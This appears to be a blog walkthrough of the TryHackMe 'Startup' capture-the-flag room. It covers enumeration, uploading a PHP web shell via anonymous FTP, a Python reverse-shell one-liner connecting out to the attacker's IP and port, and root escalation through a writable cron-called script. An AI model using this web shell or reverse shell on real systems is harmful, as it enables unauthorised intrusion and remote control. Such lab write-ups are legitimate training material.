Open in app

Sign in

Write

Sign in

Startup

Penthos
4 min readOct 10, 2021

Link: https://tryhackme.com/room/startup

Enumeration

Nmap

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

FTP

With anonymous user, i get the files from the server

I tested uploading a file to the ftp in the /ftp directory and it worked!

Port 80

Looking at the website we see no spice!

Some quick enum show /files path accessible with simular contents to the FTP directory

Rce

Let’s test RCE next with a simple shell.

Upload a php shell to the ftp server.

echo "<?php system($_GET['cmd']); ?>" > file.phpftp IP
cd ftp
put file.php
exit

Now visit the files directory and check for the file!

Nice, lets test rce next.

Nice, it's working, lets upgrade to a better shell.

Replace IP and PORT with your own.

http://10.10.193.7/files/ftp/file.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

We’re on!, its time to enumerate a bit…

Going to the root / directory we find some interesting files…

$ cat recipe.txt 
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

Then we find a folder calling incidents with a suspicious.pcspng file.

I copy this over to my machine for further analysis.

# On the attacking machine in the incidents folder.
python3 -m http.server 8899# On your machine
wget IP/suspicious.pcapng

Then open the file in Wireshark

wireshark suspicious.pcapng

Right-click on some data and select the follow > tcp stream

Then start to cycle through the stream data via the up and down arrows.

A few streams in we can see someone getting a reverse shell too and some more juicy info.

Using this new info we can login to the main account ‘lennie’ now.

User

Now we can login as lennie and get the user flag

Root

Looking at the files in lennies folder reveals some interesting things like a script and a startup list.

And in lennies Documents folder, we can see a few more files of interest.

Looks like a few hints on with to put into the list file maybe? Let’s try a few things.

From the planner.sh we can see a call to another file

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

rwx? that’s weird, the w means we should have write access.

nano /etc/print.sh

Sure enough, we do!, time to get root!

Now run ./planner.sh and get a root shell :)

Tryhackme Walkthrough
Tryhackme
Hacking
Pentesting
Walkthrough

--

--

Penthos

Written by Penthos

184 Followers

The Cyber War God

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams